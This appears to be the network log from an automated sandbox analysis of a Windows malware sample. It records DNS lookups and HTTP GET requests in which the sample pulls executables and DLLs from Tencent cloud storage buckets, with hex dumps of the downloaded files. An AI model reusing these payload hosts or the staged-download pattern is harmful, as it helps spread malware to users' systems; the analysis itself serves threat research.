                                                                Jul 25, 2024 17:03:22.545089960 CEST1.1.1.1192.168.2.70x3f68No error (0)bj.file.myqcloud.com82.156.94.17A (IP address)IN (0x0001)false
                                                                Jul 25, 2024 17:03:22.545089960 CEST1.1.1.1192.168.2.70x3f68No error (0)bj.file.myqcloud.com82.156.94.45A (IP address)IN (0x0001)false
                                                                Jul 25, 2024 17:03:22.545089960 CEST1.1.1.1192.168.2.70x3f68No error (0)bj.file.myqcloud.com82.156.94.47A (IP address)IN (0x0001)false
                                                                Jul 25, 2024 17:03:22.545089960 CEST1.1.1.1192.168.2.70x3f68No error (0)bj.file.myqcloud.com82.156.94.48A (IP address)IN (0x0001)false
                                                                Jul 25, 2024 17:03:29.226697922 CEST1.1.1.1192.168.2.70xd4b8No error (0)wwwqd-1323571269.cos.ap-singapore.myqcloud.comsgp.file.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                                Jul 25, 2024 17:03:29.226697922 CEST1.1.1.1192.168.2.70xd4b8No error (0)sgp.file.myqcloud.com43.153.232.152A (IP address)IN (0x0001)false
                                                                Jul 25, 2024 17:03:29.226697922 CEST1.1.1.1192.168.2.70xd4b8No error (0)sgp.file.myqcloud.com43.152.64.193A (IP address)IN (0x0001)false
                                                                Jul 25, 2024 17:03:29.226697922 CEST1.1.1.1192.168.2.70xd4b8No error (0)sgp.file.myqcloud.com43.152.64.207A (IP address)IN (0x0001)false
                                                                Jul 25, 2024 17:03:29.226697922 CEST1.1.1.1192.168.2.70xd4b8No error (0)sgp.file.myqcloud.com43.153.232.151A (IP address)IN (0x0001)false
                                                                Jul 25, 2024 17:03:29.902007103 CEST1.1.1.1192.168.2.70x7c7Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                • kdll-1323571269.cos.ap-beijing.myqcloud.com
                                                                • leisuretrade-1323571269.cos.ap-beijing.myqcloud.com
                                                                • wwwqd-1323571269.cos.ap-singapore.myqcloud.com
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.74970982.156.94.454436932C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-07-25 15:03:01 UTC124OUTGET /1.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0
                                                                Host: kdll-1323571269.cos.ap-beijing.myqcloud.com
                                                                Cache-Control: no-cache
                                                                2024-07-25 15:03:03 UTC219INHTTP/1.1 404 Not Found
                                                                Content-Type: application/xml
                                                                Content-Length: 427
                                                                Connection: close
                                                                Date: Thu, 25 Jul 2024 15:03:02 GMT
                                                                Server: tencent-cos
                                                                x-cos-request-id: NjZhMjY5MjVfOThiMzE0MGJfMTUxZGVfNDA2NTUzOA==
                                                                2024-07-25 15:03:03 UTC427INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 75 74 66 2d 38 27 20 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 09 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 0a 09 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 0a 09 3c 52 65 73 6f 75 72 63 65 3e 2f 31 2e 65 78 65 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 09 3c 52 65 71 75 65 73 74 49 64 3e 4e 6a 5a 68 4d 6a 59 35 4d 6a 56 66 4f 54 68 69 4d 7a 45 30 4d 47 4a 66 4d 54 55 78 5a 47 56 66 4e 44 41 32 4e 54 55 7a 4f 41 3d 3d 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 09 3c 54 72 61 63 65 49 64 3e 4f 47 56 6d 59 7a 5a 69 4d 6d 51 7a 59 6a 41 32 4f 57 4e 68 4f
                                                                Data Ascii: <?xml version='1.0' encoding='utf-8' ?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Resource>/1.exe</Resource><RequestId>NjZhMjY5MjVfOThiMzE0MGJfMTUxZGVfNDA2NTUzOA==</RequestId><TraceId>OGVmYzZiMmQzYjA2OWNhO


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.74971082.156.94.454436932C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-07-25 15:03:05 UTC131OUTGET /msvcr120.dll HTTP/1.1
                                                                User-Agent: Mozilla/5.0
                                                                Host: kdll-1323571269.cos.ap-beijing.myqcloud.com
                                                                Cache-Control: no-cache
                                                                2024-07-25 15:03:06 UTC476INHTTP/1.1 200 OK
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 970744
                                                                Connection: close
                                                                Accept-Ranges: bytes
                                                                Content-Disposition: attachment
                                                                Date: Thu, 25 Jul 2024 15:03:06 GMT
                                                                ETag: "50097ec217ce0ebb9b4caa09cd2cd73a"
                                                                Last-Modified: Wed, 20 Mar 2024 20:21:49 GMT
                                                                Server: tencent-cos
                                                                x-cos-force-download: true
                                                                x-cos-hash-crc64ecma: 7136594693983466067
                                                                x-cos-request-id: NjZhMjY5MmFfOTk0ZTQ0MGJfMjQwNjRfM2M1MzE5MQ==
                                                                x-cos-server-side-encryption: AES256
                                                                2024-07-25 15:03:06 UTC7728INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 53 39 02 12 17 58 6c 41 17 58 6c 41 17 58 6c 41 ca a7 a7 41 14 58 6c 41 17 58 6d 41 a7 58 6c 41 51 09 8c 41 b9 5a 6c 41 51 09 b3 41 76 58 6c 41 51 09 89 41 21 58 6c 41 51 09 8d 41 af 58 6c 41 51 09 b0 41 16 58 6c 41 51 09 b7 41 16 58 6c 41 51 09 b2 41 16 58 6c 41 52 69 63 68 17 58 6c 41 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e6 7c 4f 52 00 00 00 00 00 00 00 00 e0 00 22
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$S9XlAXlAXlAAXlAXmAXlAQAZlAQAvXlAQA!XlAQAXlAQAXlAQAXlAQAXlARichXlAPEL|OR"
                                                                2024-07-25 15:03:06 UTC8184INData Raw: af 72 0a 00 af 53 03 00 65 57 03 00 27 1f 0c 00 1f 76 0a 00 c4 b7 0a 00 46 e3 07 00 65 e3 07 00 d7 b3 07 00 84 3d 0a 00 49 15 03 00 12 03 0a 00 0f 2f 08 00 b1 2f 08 00 05 c1 02 00 27 e2 07 00 85 57 03 00 d2 7b 01 00 9c 33 08 00 5c ce 02 00 bf 3d 0a 00 63 89 08 00 46 e2 07 00 e4 34 08 00 ad 35 08 00 69 36 08 00 90 35 08 00 e5 38 08 00 04 39 08 00 86 36 08 00 a7 36 08 00 c9 36 08 00 ea 36 08 00 2b 44 03 00 7a 37 08 00 bd 25 03 00 7a 3a 08 00 97 37 08 00 b8 37 08 00 da 37 08 00 fb 37 08 00 e4 1a 0a 00 4a 1c 0a 00 6c 02 08 00 b0 02 08 00 00 03 08 00 42 03 08 00 92 03 08 00 d9 03 08 00 38 06 08 00 50 06 08 00 81 76 0a 00 d4 78 0a 00 24 39 08 00 3e 39 08 00 5a 39 08 00 77 39 08 00 94 39 08 00 b3 39 08 00 d1 e4 07 00 a3 e5 07 00 17 e5 07 00 5d e5 07 00 37 b8 0a
                                                                Data Ascii: rSeW'vFe=I//'W{3\=cF45i65896666+Dz7%z:7777JlB8Pvx$9>9Z9w999]7
                                                                2024-07-25 15:03:06 UTC8184INData Raw: 15 cd 00 00 1f cd 00 00 2b cd 00 00 35 cd 00 00 41 cd 00 00 4c cd 00 00 59 cd 00 00 62 cd 00 00 6d cd 00 00 75 cd 00 00 7d cd 00 00 87 cd 00 00 90 cd 00 00 9b cd 00 00 a5 cd 00 00 af cd 00 00 b9 cd 00 00 c5 cd 00 00 d2 cd 00 00 dc cd 00 00 e7 cd 00 00 f2 cd 00 00 fd cd 00 00 0a ce 00 00 15 ce 00 00 21 ce 00 00 2e ce 00 00 36 ce 00 00 40 ce 00 00 4a ce 00 00 56 ce 00 00 61 ce 00 00 67 ce 00 00 71 ce 00 00 7d ce 00 00 8b ce 00 00 97 ce 00 00 a5 ce 00 00 b3 ce 00 00 be ce 00 00 cb ce 00 00 d8 ce 00 00 e2 ce 00 00 e8 ce 00 00 f1 ce 00 00 fa ce 00 00 02 cf 00 00 0a cf 00 00 14 cf 00 00 1d cf 00 00 28 cf 00 00 31 cf 00 00 3c cf 00 00 48 cf 00 00 54 cf 00 00 5c cf 00 00 63 cf 00 00 6c cf 00 00 77 cf 00 00 80 cf 00 00 8b cf 00 00 92 cf 00 00 9b cf 00 00 a2 cf 00
                                                                Data Ascii: +5ALYbmu}!.6@JVagq}(1<HT\clw
                                                                2024-07-25 15:03:06 UTC8184INData Raw: 61 74 65 40 31 32 40 40 5a 00 3f 3f 30 5f 54 61 73 6b 43 6f 6c 6c 65 63 74 69 6f 6e 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 51 41 45 40 58 5a 00 3f 3f 30 5f 54 69 6d 65 72 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 49 41 45 40 49 5f 4e 40 5a 00 3f 3f 30 5f 5f 6e 6f 6e 5f 72 74 74 69 5f 6f 62 6a 65 63 74 40 73 74 64 40 40 51 41 45 40 41 42 56 30 31 40 40 5a 00 3f 3f 30 5f 5f 6e 6f 6e 5f 72 74 74 69 5f 6f 62 6a 65 63 74 40 73 74 64 40 40 51 41 45 40 50 42 44 40 5a 00 3f 3f 30 62 61 64 5f 63 61 73 74 40 73 74 64 40 40 41 41 45 40 50 42 51 42 44 40 5a 00 3f 3f 30 62 61 64 5f 63 61 73 74 40 73 74 64 40 40 51 41 45 40 41 42 56 30 31 40 40 5a 00 3f 3f 30 62 61 64 5f 63 61 73 74 40 73 74 64 40 40 51 41 45 40 50 42
                                                                Data Ascii: ate@12@@Z??0_TaskCollection@details@Concurrency@@QAE@XZ??0_Timer@details@Concurrency@@IAE@I_N@Z??0__non_rtti_object@std@@QAE@ABV01@@Z??0__non_rtti_object@std@@QAE@PBD@Z??0bad_cast@std@@AAE@PBQBD@Z??0bad_cast@std@@QAE@ABV01@@Z??0bad_cast@std@@QAE@PB
                                                                2024-07-25 15:03:06 UTC8184INData Raw: 40 3f 24 5f 53 70 69 6e 57 61 69 74 40 24 30 41 40 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 49 41 45 58 58 5a 00 3f 5f 47 65 74 40 5f 43 75 72 72 65 6e 74 53 63 68 65 64 75 6c 65 72 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 53 41 3f 41 56 5f 53 63 68 65 64 75 6c 65 72 40 32 33 40 58 5a 00 3f 5f 47 65 74 43 6f 6e 63 52 54 54 72 61 63 65 49 6e 66 6f 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 59 41 50 42 55 5f 43 4f 4e 43 52 54 5f 54 52 41 43 45 5f 49 4e 46 4f 40 64 65 74 61 69 6c 73 40 31 40 58 5a 00 3f 5f 47 65 74 43 6f 6e 63 75 72 72 65 6e 63 79 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 59 41 49 58 5a 00 3f 5f 47 65 74 43 75 72 72 65 6e 74 49 6e 6c 69 6e 65 44 65 70 74 68 40 5f 53 74
                                                                Data Ascii: @?$_SpinWait@$0A@@details@Concurrency@@IAEXXZ?_Get@_CurrentScheduler@details@Concurrency@@SA?AV_Scheduler@23@XZ?_GetConcRTTraceInfo@Concurrency@@YAPBU_CONCRT_TRACE_INFO@details@1@XZ?_GetConcurrency@details@Concurrency@@YAIXZ?_GetCurrentInlineDepth@_St
                                                                2024-07-25 15:03:07 UTC16384INData Raw: 5f 5f 67 65 74 5f 74 6c 73 69 6e 64 65 78 00 5f 5f 67 65 74 6d 61 69 6e 61 72 67 73 00 5f 5f 69 6e 69 74 65 6e 76 00 5f 5f 69 6f 62 5f 66 75 6e 63 00 5f 5f 69 73 61 73 63 69 69 00 5f 5f 69 73 63 73 79 6d 00 5f 5f 69 73 63 73 79 6d 66 00 5f 5f 69 73 77 63 73 79 6d 00 5f 5f 69 73 77 63 73 79 6d 66 00 5f 5f 6c 63 6f 6e 76 00 5f 5f 6c 63 6f 6e 76 5f 69 6e 69 74 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 63 6f 73 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 63 6f 73 66 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 73 69 6e 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 73 69 6e 66 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 74 61 6e 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 74 61 6e 32 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 74 61 6e 66 00 5f 5f 6c 69 62 6d 5f 73 73 65 32
                                                                Data Ascii: __get_tlsindex__getmainargs__initenv__iob_func__isascii__iscsym__iscsymf__iswcsym__iswcsymf__lconv__lconv_init__libm_sse2_acos__libm_sse2_acosf__libm_sse2_asin__libm_sse2_asinf__libm_sse2_atan__libm_sse2_atan2__libm_sse2_atanf__libm_sse2
                                                                2024-07-25 15:03:07 UTC8168INData Raw: 67 65 00 90 4e 6f 20 73 70 61 63 65 20 6c 65 66 74 20 6f 6e 20 64 65 76 69 63 65 00 49 6e 76 61 6c 69 64 20 73 65 65 6b 00 90 90 90 52 65 61 64 2d 6f 6e 6c 79 20 66 69 6c 65 20 73 79 73 74 65 6d 00 90 90 54 6f 6f 20 6d 61 6e 79 20 6c 69 6e 6b 73 00 90 42 72 6f 6b 65 6e 20 70 69 70 65 00 44 6f 6d 61 69 6e 20 65 72 72 6f 72 00 90 90 90 52 65 73 75 6c 74 20 74 6f 6f 20 6c 61 72 67 65 00 90 90 90 52 65 73 6f 75 72 63 65 20 64 65 61 64 6c 6f 63 6b 20 61 76 6f 69 64 65 64 00 90 90 46 69 6c 65 6e 61 6d 65 20 74 6f 6f 20 6c 6f 6e 67 00 90 90 4e 6f 20 6c 6f 63 6b 73 20 61 76 61 69 6c 61 62 6c 65 00 90 46 75 6e 63 74 69 6f 6e 20 6e 6f 74 20 69 6d 70 6c 65 6d 65 6e 74 65 64 00 90 90 90 44 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 65 6d 70 74 79 00 49 6c 6c 65 67 61 6c
                                                                Data Ascii: geNo space left on deviceInvalid seekRead-only file systemToo many linksBroken pipeDomain errorResult too largeResource deadlock avoidedFilename too longNo locks availableFunction not implementedDirectory not emptyIllegal
                                                                2024-07-25 15:03:07 UTC8184INData Raw: 61 00 2d 00 4e 00 4f 00 00 00 90 90 61 00 72 00 2d 00 54 00 4e 00 00 00 65 00 6e 00 2d 00 5a 00 41 00 00 00 65 00 73 00 2d 00 44 00 4f 00 00 00 73 00 72 00 2d 00 42 00 41 00 2d 00 43 00 79 00 72 00 6c 00 00 00 90 90 73 00 6d 00 61 00 2d 00 53 00 45 00 00 00 90 90 61 00 72 00 2d 00 4f 00 4d 00 00 00 65 00 6e 00 2d 00 4a 00 4d 00 00 00 65 00 73 00 2d 00 56 00 45 00 00 00 73 00 6d 00 73 00 2d 00 46 00 49 00 00 00 90 90 61 00 72 00 2d 00 59 00 45 00 00 00 65 00 6e 00 2d 00 43 00 42 00 00 00 65 00 73 00 2d 00 43 00 4f 00 00 00 73 00 6d 00 6e 00 2d 00 46 00 49 00 00 00 90 90 61 00 72 00 2d 00 53 00 59 00 00 00 65 00 6e 00 2d 00 42 00 5a 00 00 00 65 00 73 00 2d 00 50 00 45 00 00 00 61 00 72 00 2d 00 4a 00 4f 00 00 00 65 00 6e 00 2d 00 54 00 54 00 00 00 65 00 73
                                                                Data Ascii: a-NOar-TNen-ZAes-DOsr-BA-Cyrlsma-SEar-OMen-JMes-VEsms-FIar-YEen-CBes-COsmn-FIar-SYen-BZes-PEar-JOen-TTes
                                                                2024-07-25 15:03:07 UTC16368INData Raw: 8d 41 ff 8b 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 55 8b ec 8b 55 14 8b 4d 08 56 85 d2 0f 84 5f e5 00 00 85 c9 0f 84 64 e5 00 00 8b 45 0c 85 c0 0f 84 59 e5 00 00 85 d2 0f 84 5b e5 00 00 8b 75 10 85 f6 0f 84 a2 38 04 00 53 8b d9 57 8b f8 83 fa ff 75 1e 2b de 8a 06 88 04 33 46 84 c0 74 03 4f 75 f3 85 ff 5f 5b 0f 84 d5 bf 01 00 33 c0 5e 5d c3 2b f1 8a 04 1e 88 03 43 84 c0 74 06 4f 74 03 4a 75 f0 85 d2 75 db 88 13 eb d7 55 56 57 53 8b ea 33 c0 33 db 33 d2 33 f6 33 ff ff d1 5b 5f 5e 5d c3 55 8b ec 83 ec 18 8b 45 08 8b 55 0c 53 8b 5d 14 56 57 c6 45 ff 00 8b 7b 08 8d 73 10 33 38 c7 45 f4 01 00 00 00 8b 07 83 f8 fe 0f 85 a5 d1 04 00 8b 47 08 8b 4f 0c 03 ce 33 0c 30 ff d2 8b 45 10 f6 40 04 66 0f
                                                                Data Ascii: AL$+AL$+AL$+AL$+UUMV_dEY[u8SWu+3FtOu_[3^]+CtOtJuuUVWS33333[_^]UEUS]VWE{s38EGO30E@f
                                                                2024-07-25 15:03:07 UTC8184INData Raw: c6 06 30 e9 58 01 00 00 8b 35 5c 17 0e 10 e9 3b 04 00 00 c6 85 d4 fd ff ff 2d eb 10 c6 85 d4 fd ff ff 2b eb 07 c6 85 d4 fd ff ff 20 c7 85 cc fd ff ff 01 00 00 00 e9 3b 01 00 00 f6 c3 04 0f 85 95 01 00 00 8d 85 e0 fd ff ff 50 ff b5 d0 fd ff ff 57 6a 30 e8 92 ca ff ff 83 c4 10 e9 78 01 00 00 85 c0 0f 8e 83 01 00 00 8b ce 48 89 85 c4 fd ff ff 0f b7 01 83 c1 02 50 6a 06 8d 45 f4 89 8d 84 fd ff ff 50 8d 85 a0 fd ff ff 50 e8 c5 9b 00 00 83 c4 10 85 c0 75 43 39 85 a0 fd ff ff 74 3b ff b5 a8 fd ff ff 8d 85 e0 fd ff ff 50 ff b5 d0 fd ff ff 8d 45 f4 ff b5 a0 fd ff ff 50 e8 72 ca ff ff 8b 85 c4 fd ff ff 83 c4 14 8b 8d 84 fd ff ff 85 c0 0f 84 30 01 00 00 eb 90 83 c9 ff 89 8d e0 fd ff ff e9 26 01 00 00 8d 85 e0 fd ff ff 50 ff b5 d0 fd ff ff 57 6a 20 e8 ed c9 ff ff 83
                                                                Data Ascii: 0X5\;-+ ;PWj0xHPjEPPuC9t;PEPr0&PWj


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.74971182.156.94.454436932C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-07-25 15:03:13 UTC135OUTGET /vcruntime140.dll HTTP/1.1
                                                                User-Agent: Mozilla/5.0
                                                                Host: kdll-1323571269.cos.ap-beijing.myqcloud.com
                                                                Cache-Control: no-cache
                                                                2024-07-25 15:03:14 UTC476INHTTP/1.1 200 OK
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 91104
                                                                Connection: close
                                                                Accept-Ranges: bytes
                                                                Content-Disposition: attachment
                                                                Date: Thu, 25 Jul 2024 15:03:14 GMT
                                                                ETag: "9c133b18fa9ed96e1aeb2da66e4a4f2b"
                                                                Last-Modified: Wed, 20 Mar 2024 20:24:50 GMT
                                                                Server: tencent-cos
                                                                x-cos-force-download: true
                                                                x-cos-hash-crc64ecma: 15584681233261869999
                                                                x-cos-request-id: NjZhMjY5MzJfZDRiNTE0MGJfMTM4ZjRfNDA1ZDZjMg==
                                                                x-cos-server-side-encryption: AES256
                                                                2024-07-25 15:03:14 UTC15908INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 8f b4 8a e1 ee da d9 e1 ee da d9 e1 ee da d9 32 9c db d8 e3 ee da d9 e8 96 49 d9 ea ee da d9 e1 ee db d9 c8 ee da d9 e7 6f d9 d8 f2 ee da d9 e7 6f de d8 f7 ee da d9 e7 6f df d8 fd ee da d9 e7 6f da d8 e0 ee da d9 e7 6f 25 d9 e0 ee da d9 e7 6f d8 d8 e0 ee da d9 52 69 63 68 e1 ee da d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 04 73 87 13 00 00 00 00 00 00 00 00 e0 00 22
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$2Iooooo%oRichPELs"
                                                                2024-07-25 15:03:14 UTC4INData Raw: 46 14 3b 42
                                                                Data Ascii: F;B
                                                                2024-07-25 15:03:14 UTC8184INData Raw: 14 0f 84 87 00 00 00 0f b6 c8 0f b6 42 14 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 9b 05 00 00 0f b6 4e 15 0f b6 42 15 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 79 05 00 00 0f b6 4e 16 0f b6 42 16 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 57 05 00 00 0f b6 4e 17 0f b6 42 17 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 35 05 00 00 8b 46 18 3b 42 18 0f 84 87 00 00 00 0f b6 c8 0f b6 42 18 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 08 05 00 00 0f b6 4e 19 0f b6 42 19 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 e6 04 00 00 0f b6 4e 1a 0f b6 42 1a 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 c4 04 00 00
                                                                Data Ascii: B+t3ENB+t3EyNB+t3EWNB+t3E5F;BB+t3ENB+t3ENB+t3E
                                                                2024-07-25 15:03:14 UTC8184INData Raw: 0c 53 56 e8 a4 85 00 00 57 ff 75 14 ff 75 0c e8 12 06 00 00 57 e8 c2 07 00 00 83 c4 10 50 e8 79 05 00 00 cc 55 8b ec 83 ec 38 53 8b 5d 08 81 3b 03 00 00 80 0f 84 17 01 00 00 56 57 e8 17 16 00 00 33 ff 39 78 08 74 46 57 ff 15 48 20 01 10 8b f0 e8 02 16 00 00 39 70 08 74 33 81 3b 4d 4f 43 e0 74 2b 81 3b 52 43 43 e0 74 23 ff 75 24 ff 75 20 ff 75 18 ff 75 14 ff 75 10 ff 75 0c 53 e8 19 84 00 00 83 c4 1c 85 c0 0f 85 c1 00 00 00 8b 45 18 89 45 ec 89 7d f0 39 78 0c 0f 86 b4 00 00 00 ff 75 20 50 ff 75 14 8d 45 ec ff 75 1c 50 8d 45 dc 50 e8 18 83 00 00 8b 55 e0 83 c4 18 8b 45 dc 89 45 f4 89 55 fc 3b 55 e8 0f 83 80 00 00 00 6b ca 14 89 4d f8 8b 00 8d 7d c8 6a 05 8b 70 10 8b 45 1c 03 f1 59 f3 a5 39 45 c8 7f 4e 3b 45 cc 7f 49 8b 4d d4 8b 45 d8 c1 e1 04 83 c0 f0 03 c1
                                                                Data Ascii: SVWuuWPyU8S];VW39xtFWH 9pt3;MOCt+;RCCt#u$u uuuuSEE}9xu PuEuPEPUEEU;UkM}jpEY9EN;EIME
                                                                2024-07-25 15:03:14 UTC8184INData Raw: 09 c6 46 04 03 eb 03 83 26 00 8b c6 5e 5d c2 04 00 55 8b ec 8b 55 0c 83 fa 09 77 20 83 39 ff 74 17 3b 11 7f 13 8b 54 91 04 8b 45 08 8b 0a 89 08 8b 4a 04 89 48 04 eb 11 6a 02 eb 02 6a 03 8b 4d 08 e8 70 fd ff ff 8b 45 08 5d c2 08 00 55 8b ec 51 51 ff 75 0c 8d 4d f8 e8 e9 fc ff ff ff 75 10 8b c8 ff 75 08 e8 74 00 00 00 8b 45 08 c9 c3 55 8b ec 51 51 ff 75 0c 83 65 f8 00 8d 4d f8 83 65 fc 00 e8 42 10 00 00 ff 75 10 8d 4d f8 ff 75 08 e8 49 00 00 00 8b 45 08 c9 c3 55 8b ec 51 51 ff 75 0c 8d 4d f8 e8 0c fd ff ff ff 75 10 8b c8 ff 75 08 e8 27 00 00 00 8b 45 08 c9 c3 55 8b ec 8b 11 56 8b 75 08 ff 75 0c 89 16 8b 49 04 89 4e 04 8b ce e8 6d 00 00 00 8b c6 5e 5d c2 08 00 55 8b ec 8b 11 56 8b 75 08 ff 75 0c 89 16 8b 49 04 89 4e 04 8b ce e8 a3 00 00 00 8b c6 5e 5d c2 08
                                                                Data Ascii: F&^]UUw 9t;TEJHjjMpE]UQQuMuutEUQQueMeBuMuIEUQQuMuu'EUVuuINm^]UVuuIN^]
                                                                2024-07-25 15:03:14 UTC8184INData Raw: 20 e8 cb f0 ff ff eb 30 6a 08 b9 1c 13 01 10 e8 1f 14 00 00 8b f0 85 f6 74 13 8b ce e8 cb de ff ff c7 06 44 22 00 10 c6 46 04 20 eb 02 33 f6 56 8d 4d dc e8 bd da ff ff 8d 45 c8 50 8d 45 d0 50 8d 4d dc e8 9e e0 ff ff 8b 08 8b 58 04 89 4d f4 89 5d f8 8b 4d b8 85 c9 74 2e 8b 45 bc 89 4d c0 8d 4d c0 6a 20 89 45 c4 e8 8e e1 ff ff 8d 45 f4 50 8d 45 d0 50 8d 4d c0 e8 69 e0 ff ff 8b 08 8b 58 04 89 4d f4 89 5d f8 8b 45 d8 a8 10 0f 84 f5 00 00 00 83 7d 18 00 0f 85 69 03 00 00 85 ff 0f 8e 89 00 00 00 8d 45 e8 c7 45 e8 fc 1d 00 10 50 8d 4d d0 c7 45 ec 02 00 00 00 e8 8f dc ff ff 8d 4d f4 51 8d 4d e8 51 8b c8 e8 18 e0 ff ff 8b 45 e8 89 45 f4 8b 45 ec 89 45 f8 a1 00 13 01 10 80 38 00 74 23 8d 45 d0 50 e8 08 24 00 00 59 8d 4d f4 51 8d 4d a8 51 8b c8 e8 e9 df ff ff 8b 08
                                                                Data Ascii: 0jtD"F 3VMEPEPMXM]Mt.EMMj EEPEPMiXM]E}iEEPMEMQMQEEEE8t#EP$YMQMQ
                                                                2024-07-25 15:03:14 UTC8184INData Raw: f8 89 55 f4 56 50 e8 07 dd ff ff 50 ff 75 08 e8 d8 d6 ff ff 83 c4 1c eb 93 6a 01 56 ff 75 08 8d 41 01 a3 00 13 01 10 e8 0b 01 00 00 e9 78 ff ff ff 56 ff 75 08 8d 41 01 a3 00 13 01 10 e8 01 ef ff ff e9 dd fe ff ff 8d 45 f0 8d 4d f8 50 39 16 74 10 c7 45 f0 4c 20 00 10 c7 45 f4 09 00 00 00 eb 0e c7 45 f0 58 20 00 10 c7 45 f4 08 00 00 00 e8 59 bf ff ff 8b 0d 00 13 01 10 6a 03 e9 df fe ff ff 83 e8 53 0f 84 9f 00 00 00 83 e8 01 74 4c 48 83 e8 01 74 29 83 e8 03 74 0f 8b 4d 08 6a 02 e8 21 bd ff ff e9 02 ff ff ff ff 75 08 8d 41 01 a3 00 13 01 10 e8 01 08 00 00 e9 66 fe ff ff 8b 55 0c 8d 41 01 a3 00 13 01 10 8b 45 08 8b 0a 89 08 8b 4a 04 89 48 04 e9 d3 fe ff ff 8d 41 01 a3 00 13 01 10 8b 45 0c 39 10 74 20 50 8d 45 f0 c7 45 f0 64 20 00 10 50 ff 75 08 c7 45 f4 0f 00
                                                                Data Ascii: UVPPujVuAxVuAEMP9tEL EEX EYjStLHt)tMj!uAfUAEJHAE9t PEEd PuE
